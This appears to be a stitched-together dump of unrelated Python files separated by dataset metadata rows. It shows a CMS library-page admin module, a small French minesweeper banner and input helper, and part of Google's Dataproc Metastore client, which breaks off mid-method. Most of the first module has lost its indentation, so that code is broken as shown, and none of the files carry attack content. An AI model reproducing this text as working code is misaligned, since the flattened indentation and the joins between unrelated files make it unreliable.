lst = self.objlist(DBLibraryPageGroupList, query_index="grp", query_equal=grp)
lst.load(silent=True)
pages = []
for ent in lst:
pages.append({"page": ent.get("page"), "order": ent.get("order")})
self.call("library-grp-%s.pages" % grp, pages)
pages.sort(cmp=lambda x, y: cmp(x["order"], y["order"]) or cmp(x["page"], y["page"]))
page_info = {}
lst = self.objlist(DBLibraryPageList, query_index="code", query_equal=[ent["page"] for ent in pages])
lst.load(silent=True)
for ent in lst:
page_info[ent.get("code")] = ent
result = []
for ent in pages:
page = page_info.get(ent["page"]) or self.call("library-page-%s.content" % ent["page"], render_content=False)
if page:
code = page.get("code")
result.append('<a href="%s">%s</a>' % ("/library" if code == "index" else "/library/%s" % code, htmlescape(page.get("title"))))
return delim.join(result)
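
# Hedged illustration (hypothetical data): for a group holding the pages
# "index" ("Library") and "clans/wars" ("Clan wars"), hook_catalog renders
#   <a href="/library">Library</a><br /><a href="/library/clans/wars">Clan wars</a>
# Inline page content can invoke it via [hook:lib.catalog grp="..."], as the
# index page template above does.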
class LibraryAdmin(ConstructorModule):
def register(self):
self.rhook("menu-admin-root.index", self.menu_root_index)
self.rhook("menu-admin-library.index", self.menu_library_index)
self.rhook("permissions.list", self.permissions_list)
self.rhook("ext-admin-library.pages", self.admin_pages, priv="library.edit")
self.rhook("headmenu-admin-library.pages", self.headmenu_pages)
self.rhook("ext-admin-library.page-groups", self.admin_page_groups, priv="library.edit")
self.rhook("headmenu-admin-library.page-groups", self.headmenu_page_groups)
self.rhook("objclasses.list", self.objclasses_list)
self.rhook("advice-admin-library.index", self.advice_library)
self.rhook("admin-sociointerface.design-files", self.design_files)
def design_files(self, files):
files.append({"filename": "library.html", "description": self._("Library page layout"), "doc": "/doc/design/library"})
def advice_library(self, hook, args, advice):
advice.append({"title": self._("Library documentation"), "content": self._('You can find detailed information on the library system in the <a href="//www.%s/doc/library" target="_blank">library page</a> in the reference manual.') % self.main_host})
def objclasses_list(self, objclasses):
objclasses["LibraryPage"] = (DBLibraryPage, DBLibraryPageList)
objclasses["LibraryGroup"] = (DBLibraryGroup, DBLibraryGroupList)
objclasses["LibraryPageGroup"] = (DBLibraryPageGroup, DBLibraryPageGroupList)
def menu_root_index(self, menu):
menu.append({"id": "library.index", "text": self._("Library"), "order": 80})
def menu_library_index(self, menu):
req = self.req()
if req.has_access("library.edit"):
menu.append({"id": "library/page-groups", "text": self._("Library page groups"), "order": 5, "leaf": True})
menu.append({"id": "library/pages", "text": self._("Library pages"), "order": 10, "leaf": True})
def permissions_list(self, perms):
perms.append({"id": "library.edit", "name": self._("Library editing")})
def headmenu_pages(self, args):
if args == "new":
return [self._("New page"), "library/pages"]
elif args:
try:
page = self.obj(DBLibraryPage, args)
except ObjectNotFoundException:
pass
else:
return [htmlescape(page.get("title")), "library/pages"]
return self._("Library pages")
def admin_pages(self):
req = self.req()
m = re_del.match(req.args)
if m:
uuid = m.group(1)
try:
page = self.obj(DBLibraryPage, uuid)
except ObjectNotFoundException:
pass
else:
page.remove()
self.objlist(DBLibraryPageGroupList, query_index="page", query_equal=page.get("code")).remove()
self.call("admin.redirect", "library/pages")
if req.args:
if req.args != "new":
try:
page = self.obj(DBLibraryPage, req.args)
except ObjectNotFoundException:
self.call("admin.redirect", "library/pages")
else:
page = self.obj(DBLibraryPage)
page_groups = []
self.call("library.page-groups", page_groups)
page_groups = [pg for pg in page_groups if not pg.get("everywhere")]
if req.ok():
errors = {}
code = req.param("code").strip()
if not code:
errors["code"] = self._("This field is mandatory")
            elif code.startswith('/'):
                errors["code"] = self._("Code can't start with a slash")
            elif code.endswith('/'):
                errors["code"] = self._("Code can't end with a slash")
            elif re_double_slash.search(code):
                errors["code"] = self._("Code can't contain '//'")
elif not re_valid_code.match(code):
errors["code"] = self._("Invalid format")
else:
lst = self.objlist(DBLibraryPageList, query_index="code", query_equal=code)
if len(lst) and lst[0].uuid != page.uuid:
errors["code"] = self._("There is a page with the same code already")
else:
page.set("code", code)
title = req.param("title").strip()
if not title:
errors["title"] = self._("This field is mandatory")
else:
page.set("title", title)
content = req.param("content").strip()
page.set("content", content)
keywords = req.param("keywords").strip()
if not keywords:
errors["keywords"] = self._("This field is mandatory")
else:
page.set("keywords", keywords)
description = req.param("description").strip()
if not description:
errors["description"] = self._("This field is mandatory")
else:
page.set("description", description)
page.set("parent", req.param("parent").strip())
if len(errors):
self.call("web.response_json", {"success": False, "errors": errors})
page.store()
self.objlist(DBLibraryPageGroupList, query_index="page", query_equal=page.get("code")).remove()
for grp in page_groups:
order = req.param("grp-%s" % grp.get("code"))
if order != "":
obj = self.obj(DBLibraryPageGroup)
obj.set("page", page.get("code"))
obj.set("grp", grp.get("code"))
obj.set("order", intz(order))
obj.store()
self.call("admin.redirect", "library/pages")
fields = [
{"name": "code", "label": self._("Page code (latin letters, slashes, digits and '-'). This page code is practically a component of the page URL. This library page will be available as '/library/<code>'. You may use slashes. For example, 'clans/wars' will be available at '/library/clans/wars'. Special code 'index' means library index page: '/library'"), "value": page.get("code")},
{"name": "title", "label": self._("Page title"), "value": page.get("title")},
{"name": "parent", "label": self._("Code of the parent page"), "value": page.get("parent")},
{"name": "content", "type": "htmleditor", "label": self._("Page content. You may use hooks to include any dynamic content"), "value": page.get("content")},
{"name": "keywords", "label": self._("Page keywords (visible to search engines). Comma delimited"), "value": page.get("keywords")},
{"name": "description", "label": self._("Page decription (visible to search engines only)"), "value": page.get("description")},
]
lst = self.objlist(DBLibraryPageGroupList, query_index="page", query_equal=page.get("code"))
lst.load()
group_enabled = {}
for ent in lst:
group_enabled[ent.get("grp")] = ent.get("order")
fields.append({"type": "header", "html": self._("Which groups this page belongs to. If you want any page to show in the group specify an integer value here. This value will be the sorting order of the page in the group")})
col = 0
for grp in page_groups:
fields.append({"name": "grp-%s" % grp.get("code"), "label": htmlescape(grp.get("title")), "value": group_enabled.get(grp.get("code")), "inline": (col % 3 != 0)})
col += 1
while col % 3 != 0:
fields.append({"type": "empty", "inline": True})
col += 1
self.call("admin.form", fields=fields, modules=["HtmlEditorPlugins"])
rows = []
lst = self.objlist(DBLibraryPageList, query_index="all")
lst.load()
for ent in lst:
code = ent.get("code")
rows.append([
code,
'<hook:admin.link href="library/pages/%s" title="%s" />' % (ent.uuid, htmlescape(ent.get("title"))),
'<hook:admin.link href="library/pages/del/%s" title="%s" confirm="%s" />' % (ent.uuid, self._("delete"), self._("Are you sure want to delete this page?")),
'<a href="%s" target="_blank">%s</a>' % ("/library" if code == "index" else "/library/%s" % code, self._("view")),
])
vars = {
"tables": [
{
"links": [
{"hook": "library/pages/new", "text": self._("New library page"), "lst": True},
],
"header": [
self._("Page code"),
self._("Title"),
self._("Deletion"),
self._("Viewing"),
],
"rows": rows
}
]
}
self.call("admin.response_template", "admin/common/tables.html", vars)
def headmenu_page_groups(self, args):
if args == "new":
return [self._("New page group"), "library/page-groups"]
elif args:
try:
page_group = self.obj(DBLibraryGroup, args)
except ObjectNotFoundException:
pass
else:
return [htmlescape(page_group.get("title")), "library/page-groups"]
return self._("Library page groups")
def admin_page_groups(self):
req = self.req()
m = re_del.match(req.args)
if m:
uuid = m.group(1)
try:
page_group = self.obj(DBLibraryGroup, uuid)
except ObjectNotFoundException:
pass
else:
page_group.remove()
self.objlist(DBLibraryPageGroupList, query_index="grp", query_equal=page_group.get("code")).remove()
self.call("admin.redirect", "library/page-groups")
if req.args:
if req.args != "new":
try:
page_group = self.obj(DBLibraryGroup, req.args)
except ObjectNotFoundException:
self.call("admin.redirect", "library/page-groups")
else:
page_group = self.obj(DBLibraryGroup)
if req.ok():
errors = {}
code = req.param("code").strip()
if not code:
errors["code"] = self._("This field is mandatory")
elif not code.startswith("u_"):
errors["code"] = self._("Identifier must start with 'u_'")
elif not re_valid_pgcode.match(code):
errors["code"] = self._("Invalid format")
else:
lst = self.objlist(DBLibraryGroupList, query_index="code", query_equal=code)
if len(lst) and lst[0].uuid != page_group.uuid:
errors["code"] = self._("There is a page group with the same code already")
else:
page_group.set("code", code)
title = req.param("title").strip()
if not title:
errors["title"] = self._("This field is mandatory")
else:
page_group.set("title", title)
if req.param("block"):
page_group.set("block", 1)
page_group.set("block_order", intz(req.param("block_order")))
if req.param("block_everywhere"):
page_group.set("everywhere", 1)
else:
page_group.delkey("everywhere")
page_group.set("block_content", req.param("block_content"))
else:
page_group.delkey("block")
page_group.delkey("block_order")
page_group.delkey("block_everywhere")
page_group.delkey("block_content")
if len(errors):
self.call("web.response_json", {"success": False, "errors": errors})
page_group.store()
self.call("admin.redirect", "library/page-groups")
fields = [
{"name": "code", "label": self._("Page group code (must start with u_ and contain latin letters, digits and '_' symbols)"), "value": page_group.get("code")},
{"name": "title", "label": self._("Page group title"), "value": page_group.get("title")},
{"name": "block", "label": self._("This group is a block (HTML portion that will be shown on every page in the group)"), "type": "checkbox", "checked": page_group.get("block")},
{"name": "block_content", "type": "htmleditor", "label": self._("Block content. You may use hooks to include any dynamic content"), "value": page_group.get("block_content"), "condition": "[block]"},
{"name": "block_order", "label": self._("Block sorting order"), "value": page_group.get("block_order"), "condition": "[block]"},
{"name": "block_everywhere", "type": "checkbox", "label": self._("This block is shown on the every library page"), "checked": page_group.get("everywhere"), "condition": "[block]"},
]
self.call("admin.form", fields=fields, modules=["HtmlEditorPlugins"])
page_groups = []
self.call("library.page-groups", page_groups)
rows = []
for ent in page_groups:
code = ent.get("code")
manual = ent.get("manual")
title = htmlescape(ent.get("title"))
rows.append([
code,
'<hook:admin.link href="library/page-groups/%s" title="%s" />' % (ent.get("uuid"), title) if manual else title,
'<hook:admin.link href="library/page-groups/del/%s" title="%s" confirm="%s" />' % (ent.get("uuid"), self._("delete"), self._("Are you sure want to delete this page group?")) if manual else None,
])
vars = {
"tables": [
{
"links": [
{"hook": "library/page-groups/new", "text": self._("New library page group"), "lst": True},
],
"header": [
self._("Page group code"),
self._("Title"),
self._("Deletion"),
],
"rows": rows
}
]
}
self.call("admin.response_template", "admin/common/tables.html", vars)
| gpl-3.0 | 2,122,445,489,926,149,000 | 45.826087 | 404 | 0.525618 | false | 4.027537 | false | false | false |
nbstr/demineur | beautiful.py | 1 | 1191 |
#=========================================#
# BEAUTIFUL #
#=========================================#
#=========================================#
# HEADER #
#=========================================#
def header(text="DÉMINEUR", vp=1, p=6, m=7, s="#", s2="="):
"""
Affiche un beau titre.
"""
padding = p*" "
margin = m*" "
void = margin + s + " "*(len(text) + 2*p) + s
print("\n" + margin + s + s2*(len(text) + 2*p) + s)
for i in range(vp):
print(void)
print(margin + s + padding + text + padding + s)
for i in range(vp):
print(void)
print(margin + s + s2*(len(text) + 2*p) + s + "\n")
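
# Hedged usage sketch (not part of the original script):
#
#     header("SCORES", p=2, s="*", s2="-")
#
# draws a '*'-bordered box with '-' rules around "SCORES",
# padded by 2 spaces on each side.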
#=========================================#
# INPUT INT #
#=========================================#
def input_int(txt="Veuillez entrer un nombre : ", error="!! Vous n'avez pas entré un nombre"):
"""
Retourne un int envoyé par l'utilisateur avec la gestion des exceptions
"""
while True:
try:
n = int(input(txt))
break
except ValueError:
print (error + "\n")
return n | unlicense | -3,643,178,339,065,126,400 | 26.651163 | 94 | 0.355219 | false | 3.689441 | false | false | false |
googleapis/python-dataproc-metastore | google/cloud/metastore_v1alpha/services/dataproc_metastore/client.py | 1 | 77386 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.api_core import operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.metastore_v1alpha.services.dataproc_metastore import pagers
from google.cloud.metastore_v1alpha.types import metastore
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from .transports.base import DataprocMetastoreTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import DataprocMetastoreGrpcTransport
from .transports.grpc_asyncio import DataprocMetastoreGrpcAsyncIOTransport
class DataprocMetastoreClientMeta(type):
"""Metaclass for the DataprocMetastore client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[DataprocMetastoreTransport]]
_transport_registry["grpc"] = DataprocMetastoreGrpcTransport
_transport_registry["grpc_asyncio"] = DataprocMetastoreGrpcAsyncIOTransport
def get_transport_class(
cls, label: str = None,
) -> Type[DataprocMetastoreTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class DataprocMetastoreClient(metaclass=DataprocMetastoreClientMeta):
"""Configures and manages metastore services. Metastore services are
fully managed, highly available, auto-scaled, auto-healing,
OSS-native deployments of technical metadata management software.
Each metastore service exposes a network endpoint through which
metadata queries are served. Metadata queries can originate from a
variety of sources, including Apache Hive, Apache Presto, and Apache
Spark.
The Dataproc Metastore API defines the following resource model:
- The service works with a collection of Google Cloud projects,
named: ``/projects/*``
- Each project has a collection of available locations, named:
``/locations/*`` (a location must refer to a Google Cloud
``region``)
- Each location has a collection of services, named:
``/services/*``
- Dataproc Metastore services are resources with names of the form:
``/projects/{project_number}/locations/{location_id}/services/{service_id}``.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "metastore.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataprocMetastoreClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataprocMetastoreClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> DataprocMetastoreTransport:
"""Returns the transport used by the client instance.
Returns:
DataprocMetastoreTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def backup_path(project: str, location: str, service: str, backup: str,) -> str:
"""Returns a fully-qualified backup string."""
return "projects/{project}/locations/{location}/services/{service}/backups/{backup}".format(
project=project, location=location, service=service, backup=backup,
)
@staticmethod
def parse_backup_path(path: str) -> Dict[str, str]:
"""Parses a backup path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/services/(?P<service>.+?)/backups/(?P<backup>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def metadata_import_path(
project: str, location: str, service: str, metadata_import: str,
) -> str:
"""Returns a fully-qualified metadata_import string."""
return "projects/{project}/locations/{location}/services/{service}/metadataImports/{metadata_import}".format(
project=project,
location=location,
service=service,
metadata_import=metadata_import,
)
@staticmethod
def parse_metadata_import_path(path: str) -> Dict[str, str]:
"""Parses a metadata_import path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/services/(?P<service>.+?)/metadataImports/(?P<metadata_import>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def network_path(project: str, network: str,) -> str:
"""Returns a fully-qualified network string."""
return "projects/{project}/global/networks/{network}".format(
project=project, network=network,
)
@staticmethod
def parse_network_path(path: str) -> Dict[str, str]:
"""Parses a network path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/global/networks/(?P<network>.+?)$", path
)
return m.groupdict() if m else {}
@staticmethod
def service_path(project: str, location: str, service: str,) -> str:
"""Returns a fully-qualified service string."""
return "projects/{project}/locations/{location}/services/{service}".format(
project=project, location=location, service=service,
)
@staticmethod
def parse_service_path(path: str) -> Dict[str, str]:
"""Parses a service path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/services/(?P<service>.+?)$",
path,
)
return m.groupdict() if m else {}
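
    # Illustrative round-trip with placeholder values:
    #   service_path("my-proj", "us-central1", "my-svc")
    #   -> "projects/my-proj/locations/us-central1/services/my-svc"
    #   parse_service_path(the same string)
    #   -> {"project": "my-proj", "location": "us-central1", "service": "my-svc"}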
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, DataprocMetastoreTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the dataproc metastore client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, DataprocMetastoreTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, DataprocMetastoreTransport):
# transport is a DataprocMetastoreTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
)
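
    # Hedged construction sketch: client_options may be passed as a plain dict,
    #   DataprocMetastoreClient(client_options={"api_endpoint": "metastore.googleapis.com"})
    # and credentials are resolved from the environment when not supplied.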
def list_services(
self,
request: metastore.ListServicesRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListServicesPager:
r"""Lists services in a project and location.
Args:
request (google.cloud.metastore_v1alpha.types.ListServicesRequest):
The request object. Request message for
[DataprocMetastore.ListServices][google.cloud.metastore.v1alpha.DataprocMetastore.ListServices].
parent (str):
Required. The relative resource name of the location of
metastore services to list, in the following form:
``projects/{project_number}/locations/{location_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.services.dataproc_metastore.pagers.ListServicesPager:
Response message for
[DataprocMetastore.ListServices][google.cloud.metastore.v1alpha.DataprocMetastore.ListServices].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.ListServicesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.ListServicesRequest):
request = metastore.ListServicesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_services]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListServicesPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
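
    # Hedged usage sketch (the parent value is a placeholder):
    #   for service in client.list_services(
    #           parent="projects/my-proj/locations/us-central1"):
    #       print(service.name)
    # The returned pager fetches additional pages transparently.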
def get_service(
self,
request: metastore.GetServiceRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.Service:
r"""Gets the details of a single service.
Args:
request (google.cloud.metastore_v1alpha.types.GetServiceRequest):
The request object. Request message for
[DataprocMetastore.GetService][google.cloud.metastore.v1alpha.DataprocMetastore.GetService].
name (str):
Required. The relative resource name of the metastore
service to retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.types.Service:
A managed metastore service that
serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.GetServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.GetServiceRequest):
request = metastore.GetServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_service(
self,
request: metastore.CreateServiceRequest = None,
*,
parent: str = None,
service: metastore.Service = None,
service_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a metastore service in a project and
location.
Args:
request (google.cloud.metastore_v1alpha.types.CreateServiceRequest):
The request object. Request message for
[DataprocMetastore.CreateService][google.cloud.metastore.v1alpha.DataprocMetastore.CreateService].
parent (str):
Required. The relative resource name of the location in
which to create a metastore service, in the following
form:
``projects/{project_number}/locations/{location_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
service (google.cloud.metastore_v1alpha.types.Service):
Required. The Metastore service to create. The ``name``
field is ignored. The ID of the created metastore
service must be provided in the request's ``service_id``
field.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
service_id (str):
Required. The ID of the metastore
service, which is used as the final
component of the metastore service's
name.
This value must be between 2 and 63
characters long inclusive, begin with a
letter, end with a letter or number, and
consist of alpha-numeric ASCII
characters or hyphens.
This corresponds to the ``service_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.Service` A
managed metastore service that serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, service, service_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.CreateServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.CreateServiceRequest):
request = metastore.CreateServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if service is not None:
request.service = service
if service_id is not None:
